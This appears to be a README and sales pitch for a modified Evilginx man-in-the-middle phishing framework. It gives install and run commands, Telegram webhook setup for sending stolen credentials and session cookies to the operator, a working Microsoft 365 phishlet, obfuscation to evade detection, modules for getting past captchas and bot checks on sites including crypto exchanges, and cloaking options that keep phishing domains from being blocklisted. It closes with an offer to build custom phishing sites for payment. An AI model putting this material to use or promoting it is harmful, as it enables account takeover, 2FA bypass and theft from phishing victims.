Evilginx is a man-in-the-middle attack framework used for phishing login credentials along with session cookies, which in turn allows to bypass 2-factor authentication protection.
- sudo apt install git
- git clone https://github.com/belph3gorgit/EvilGinx-3.5-bypass
- cd EvilGinx-3.5-bypass
- ./build/evilginx -p phishlets
- Done !!
Please read official evilginx 2 tutorials.
Just create bot, create group, add bot to group, get group chat id, get bot token.
execute command: config webhook_telegram bot-token/-chatid
- Free o365.yaml (Outlook, Live, Microsoft etc) phishlet working. Last test: 2024/11/4
(Read bypass methods, if u don't have specified bypass activated some of the 3rd party will not work)
- Telegram webhook.
- Identifier obfuscation to prevent websites from detecting evilginx.
- Fixed: Cookie grab failure when cookies have protection symbols.
(Problem was that some of the symbols used in cookies are not supported by the original evilginx and it can't detect the set-cookie event. )
- Fixed: Stability issues with original evilginx. Open doors to handle unlimited number of users at the same time.
- Fully obfuscated hardcoded http_proxy.go file that is not readable to prevent fast red-flag on domains.
Cloudflare - Required if site has Cloudflare Anti-DDoS page enabled.
BotGuard - Required for sites like Google (verified, trusted accounts), Microsoft o365 (some of) 3rd parties login pages usually big companies or extra protection without it lets say only 70% accounts would work etc etc.
hCaptcha, recaptcha - Required for sites that have hCaptcha, recaptcha on forms or as Anti-Ddos.
GeeTest - Needed for crypto websites like Binance, Coinbase, Blockchain etc etc
Customjs - Required for sites that have their own protection for certain actions.
Blacktds - One of the most popular and easiest option to keep your website never red. [CONS: REQUIRES MONTHLY PAYMENTS]
Cloudflare - One of the popular and cheapest options to keep your website red for longer.
Custom Js - Number one expensive protection against red, one pay for lifetime.
Custom php - Number two expensive protection against reds, one pay for lifetime
Custom Firewall - Cheap settings to avoid large amount of bots. [Doesn't fully protect against red, depends on usage.]
Usually people request website lets say aol.com it require recaptcha bypass so we configure it properly and enable required bypass method.
Then we setup it on our site, add u to telegram group where logs delivered and provide link so u can test.
When u done testing, u pay for site and we send files with required methods enabled.
So in addition if u want to enable any bypass method without ordering website it will cost more.
Since its hard to explain how to do it without doing it on website as example so u can learn.
**evilginx2** is made by Kuba Gretzky ([@mrgretzky](https://twitter.com/mrgretzky)) and it's released under BSD-3 license.
**evilginx 3.5 +bypass** is made by @Belphs and it's released under BSD-3 license.